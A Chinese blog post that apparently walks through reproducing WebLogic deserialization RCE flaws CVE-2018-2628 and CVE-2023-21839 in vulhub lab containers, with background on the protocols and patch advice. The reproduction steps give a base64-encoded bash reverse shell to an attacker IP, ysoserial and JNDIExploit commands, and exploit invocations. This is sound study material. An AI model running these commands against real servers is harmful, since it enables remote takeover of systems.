Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)

已于 2023-11-02 11:38:46 修改
阅读量3.6k 收藏 23
点赞数 6
分类专栏: Web安全 漏洞复现 文章标签: web安全 网络安全 中间件
于 2023-09-19 17:29:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rumil/article/details/133036788
版权

内容目录

Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)

weblogic中间件

WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。

CVE-2018-2628

漏洞描述

Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机。T3协议在开放WebLogic控制台端口的应用上默认开启。攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击(开放Weblogic控制台的7001端口,默认会开启T3协议服务,T3协议触发的Weblogic Server WLS Core Components中存在反序列化漏洞,攻击者可以发送构造的恶意T3协议数据,获取目标服务器权限。)

T3协议缺陷实现了Java虚拟机的远程方法调用(RMI),能够在本地虚拟机上调用远端代码。

T3协议:

用于在Weblogic服务器和其他类型的Java程序之间传输信息的协议。Weblogic会跟踪连接到应用程序的每个Java虚拟机,要将流量传输到Java虚拟机,Weblogic会创建一个T3连接。该链接会通过消除在网络之间的多个协议来最大化效率,从而使用较少的操作系统资源。用于T3连接的协议还可以最大限度减少数据包大小,提高传输速度。

RMI方法:

远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。(对象的虚拟化和反序列化广泛应用到RMI和网络传输中)

JRMP:

Java远程消息交换协议JRMP。

JRMP是一个Java远程方法协议,该协议基于TCP/IP之上,RMI协议之下。也就是说RMI该协议传递时底层使用的是JRMP协议,而JRMP底层则是基于TCP传递。

RMI默认使用的JRMP进行传递数据,并且JRMP协议只能作用于RMI协议。当然RMI支持的协议除了JRMP还有IIOP协议,而在Weblogic里面的T3协议其实也是基于RMI去进行实现的。

影响版本

Oracle Weblogic Server10.3.6.0.0

Oracle Weblogic Server12.1.3.0.0

Oracle Weblogic Server12.2.1.2.0

Oracle Weblogic Server12.2.1.3.0

漏洞复现

环境:kali linux

靶场:vulhub /vulhub/weblogic/CVE-2018-2628

开启靶场,进入环境:

image-20230919112817669

进行访问:

image-20230919112915568

Nmap扫描目标IP端口,查看是否使用weblogic

nmap -sV 192.168.100.134 //靶场ip地址

扫描结果,开放了7001端口,对应weblogic服务以及版本信息

image-20230919113107730

使用Nmap的脚本查看对方是否开启T3协议,查看到目标站点开启了T3协议

nmap -n -v -p 7001,7002 192.168.100.134 --script=weblogic-t3-info

扫描结果:说明开启了T3协议

image-20230919113245926

使用扫描工具探测是否存在weblogic漏洞:

工具地址

经过扫描,发现此漏洞(工具可能有所差异不太准确,也可使用图形化界面)

image-20230919115106767

存在CVE-2018-2628漏洞

image-20230919114820553

攻击者需要使用ysoserial启动一个JMRP Server

工具地址

其他架包使用方式都类似,大同小异,查看帮助即可。

JMRP Server在7777端口上监听请求,向目标服务器发送序列化的bash反弹shell命令,反弹监听的端口为9999

PS:

这里使用bash反弹shell,由于Runtime.getRuntime().exec()中不能使用重定向和管道符,这里需要对其进行base64编码再使用

反弹shell命令:

sh -i >& /dev/tcp/192.168.100.1/9999 0>&1

base64编码后:

bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}

开启JMRP Server服务:

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections3 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}"

image-20230919115608885

本地监听9999端口:

image-20230919121223495

接下来使用CVE-2018-2628的 EXP 向目标WebLogic服务器发送攻击载荷(payload)

python2 exp.py 192.168.100.134 7001 ysoserial-all.jar 192.168.100.1 7777 JRMPClient

image-20230919121436393

JMRP服务接受信息:

image-20230919121506408

查看监听端:

image-20230919121555545

EXP和目标服务器建立T3连接,目标服务器weblogic上的JVM虚拟机远程调用了监听程序中的方法执行序列化操作,将流量反弹到nc上

执行命令也是同样的道理,将反弹shell命令改成想要"执行操作的命令"即可。

比如"touch /test.txt"

image-20230919121910643

来到靶机验证一下是否创建成功:

docker-compose exec weblogic /bin/bash

image-20230919122001066

创建成功,命令成功被执行。

还可以使用工具进行,相对简单,直接利用:

首先开启JRMP服务:

image-20230919140232727

输入JRMP地址,进行执行

image-20230919140142417

JRMP服务返回信息内容:

image-20230919140322425

验证是否创建成功:

成功创建:

image-20230919140355754

修复方案

  • 打上官方的最新补丁
  • 控制T3服务的访问权限(添加白名单仅给指定几台主机使用)

CVE-2023-21839

漏洞描述

Weblogic 允许远程用户在未经授权的情况下通过IIOP/T3进行JNDI lookup 操作,当JDK版本过低或本地存在javaSerializedData时,这可能会导致RCE漏洞。

WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

影响版本

  • WebLogic_Server = 12.2.1.3.0
  • WebLogic_Server = 12.2.1.4.0
  • WebLogic_Server = 14.1.1.0.0

CVE-2023-21839是一个weblogic的JNDI注入漏洞

由于Weblogic t3/iiop协议支持远程绑定对象bind到服务端,并且可以通过lookup查看,当远程对象继承自OpaqueReference时,lookup查看远程对象,服务端会调用远程对象getReferent方法。weblogic.deployment.jms.ForeignOpaqueReference继承自OpaqueReference并且实现了getReferent方法,并且存在retVal = context.lookup(this.remoteJNDIName)实现,故可以通过rmi/ldap远程协议进行远程命令执行。

漏洞复现

环境:kali linux

靶场:vulhub vulhub/weblogic/CVE-2023-21839

开启环境:

image-20230919142504679

访问靶场地址:

image-20230919142625342

Nmap扫描:

nmap -sV 192.168.100.134

开放了7001端口,以及对应的weblogic服务版本

image-20230919142850639

扫描验证T3是否开启:

nmap -n -v -p 7001,7002 192.168.100.134 --script=weblogic-t3-info

image-20230919143025768

开启LDAP和HTTP服务

工具地址

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.100.1	//攻击者ip

查看可以使用的服务内容(payload):

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.100.1 -u

image-20230919160453083

本地监听端口6666:

image-20230919160315637

在本地执行命令进行攻击

工具地址

java -jar Weblogic-CVE-2023-21839.jar 192.168.100.134:7001 ldap://192.168.100.1:1389/Basic/ReverseShell/192.168.100.1/6666

PS:java环境为JDK8否则无法运行,报错

image-20230919160908122

LDAP和HTTP服务端返回信息:

image-20230919160953947

查看本地监听端口:

成功反弹shell

image-20230919161035118

另一种方法,直接使用工具,发送JNDI地址服务(开启JNDI):

输入url,验证漏洞

image-20230919161322942

验证回显:

image-20230919161303554

开启服务和以上一致

放入JNDI地址当中,然后执行,一键利用,服务端返回相应的信息以及状态:

image-20230919161424153

查看监听:

成功反弹shell

image-20230919161500414

修复方案

  1. 使用连接筛选器临时阻止外部访问7001端口的T3/T3s协议
  2. 禁用IIOP协议。
  3. 升级weblogic版本,更新最新补丁。
rumilc
关注
  • 6
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
CVE-2018-2628-MultiThreading-master.zip_CVE20182628_cve-2018-262
09-21
# WebLogic WLS核心组件反序列化漏洞 # # CVE-2018-2628 # 用法:将需要检测的 ip:port 放入同目录下的url.txt文件中。然后运行:(代码93行处修改线程数) `python CVE-2018-2628-MultiThreading.py` Usage: Place the 'ip:port' to be detected into the url.txt file in the same directory. Then run: `python CVE-2018-2628-MultiThreading.py` 运行环境: python2 environment:python2
weblogic反序列化之T3协议(CVE-2015-4582)
遇事不决冲冲冲
05-12 4226
基于T3协议的weblogic反序列化漏洞 之前说过在weblogic里面其实反序列化漏洞利用中大致分为两种,一个是基于T3协议的反序列化漏洞,一个是基于XML的反序列化漏洞,这篇来分析一下基于T3协议的weblogic,列出几个基于T3协议具有代表性的CVECVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2018-2628CVE-2020-2555、CVE-2020-2883,每个cve的思路大致都是基于上几个漏洞的补丁进行的一个绕过,本来想逐个分析,这里
Weblogic常见漏洞详解
最新发布
m0_64481831的博客
03-01 1707
Weblogic 是一个基于JavaEE架构的中间件,是用于开发、集成、部署和管理大型分布式为Web应用、网络应用和数据库应用的Java应用服务器。Weblogic由纯Java开发,被广泛应用于开发、部署和运行Java应用等适用于本地环境和云环境的企业应用。所以,Weblogic在面试当中被提到频率还蛮高的。这篇文章以vulhub靶场为辅。Weblogic中间件常见漏洞文章讲了任意文件读取和弱口令登录、未授权访问后台和HTTP请求远程代码执行、SSRF利用、XMLDecoder反序列化漏洞
网络安全---漏洞复现WebLogic 反序列化漏洞(CVE-2019-2890)漏洞复现
m0_67844671的博客
09-19 879
Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic反序列化黑名单,使攻击者可以通过T3协议对存在漏洞Weblogic组件实施远程攻击。由于T3协议在Weblogic控制台开启的情况下默认开启,而Weblogic默认安装会自动开启控制台,所以攻击者可通过此漏洞造成远程代码执行,以控制Weblogic服务器。
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ) 自己已经打上补丁了。欢迎下载
02-24
weblogic 补丁 反序列化补丁 。己已经打上补丁了。欢迎下载
Weblogic反序列化漏洞CVE-2018-2628
weixin_46411728的博客
11-15 3763
Weblogic反序列化漏洞CVE-2018-2628
Javaweb安全——Weblogic反序列化漏洞(一)
weixin_43610673的博客
12-11 2732
从原生反序列化过程开始谈起。
weblogic反序列化漏洞的初级理解(一)
Redredredfish的博客
08-27 4459
啥是weblogic Weblogic反序列化漏洞经过了几个阶段,利用技术也有多种变形 从利用方式来看,分为三类 1.直接通过T3协议发送恶意反序列化对象(CVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2020-2555、CVE-2020-2883) 2.利用T3协议配合RMP或ND接口反向发送反序列化数据(CVE2017-3248、CVE2018-2628CVE2018-2893、CVE2018-3245、CVE-2018-3191、CVE-2020-14
weblogic反序列化基本概念
sojrs_sec的博客
12-03 4485
如图,weblogic反序列化在利用过程中,主要考虑四个部分 Deliver_way :payload通过什么方式传入服务器 Payload:payload是什么格式,xml本身即为序列化对象,可直接反序列化。ysoserial生成的payload,为序列化文件 Write object():若非序列化数据,则首先经过writeobject()进行序列化 Readobject():反序列化数据...
web服务器/中间件漏洞系列2:weblogic漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
11-29 5111
前言: 漏洞环境使用vulhub docker一键搭建,利用工具包括burp suite,kali等。 weblogic简介: ​ WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 ​ WebLogic Server具有开发和部署关键任务电子商务Web应用系统 所需的多种特色和优势,包括:可拓展性、可靠性、体系.
2018最新weblogic反序列化漏洞补丁包
05-22
在p27395085_1036_Generic补丁的基础上再打上27453773_1036_Gener,解决CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2018-2628
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
Weblogic反序列化漏洞补丁(FMJJ),这是一个累积补丁,代号FMJJ
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
weblogic10.36 CVE-2018-2893补丁文件
08-02
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。2018年7月14日,Oracle 官方给该绕过漏洞分配了CVE编号CVE-2018-2893。 通过该漏洞,攻击者可以在未授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协议数据,就可以实现远程代码执行获取目标服务器的权限。
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
Weblogic 反序列化漏洞检查工具CVE-2017-10271.zip
07-09
Weblogic 反序列化漏洞检查工具CVE-2017-10271.zip
Weblogic XML反序列化漏洞检查工具CVE-2017-10271
02-22
Weblogic XML反序列化漏洞检查工具CVE-2017-10271,用于网络管理员发现网络中存在的Weblogic XML反序列化漏洞,及时进行修补
Weblogic IIOP反序列化漏洞(CVE-2020-2551)
07-28
嗨!关于Weblogic IIOP反序列化漏洞CVE-2020-2551),以下是一些相关信息: CVE-2020-2551是Weblogic Server的一个严重漏洞,该漏洞允许攻击者通过发送特制的T3协议请求来执行任意代码。这个漏洞属于Java反序列化漏洞的一种。 该漏洞的影响版本包括Weblogic Server 10.3.6.0.0、12.1.3.0.0和12.2.1.3.0。攻击者可以利用该漏洞远程执行任意代码,可能导致服务器的完全控制。 Oracle已经发布了安全补丁来修复这个漏洞。建议受影响的用户尽快升级到修复版本,并确保及时应用所有安全补丁。 此外,还可以通过配置防火墙规则、限制网络访问和监控异常行为等方法来增强系统的安全性。 希望这些信息能对你有所帮助!如果还有其他问题,请继续提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值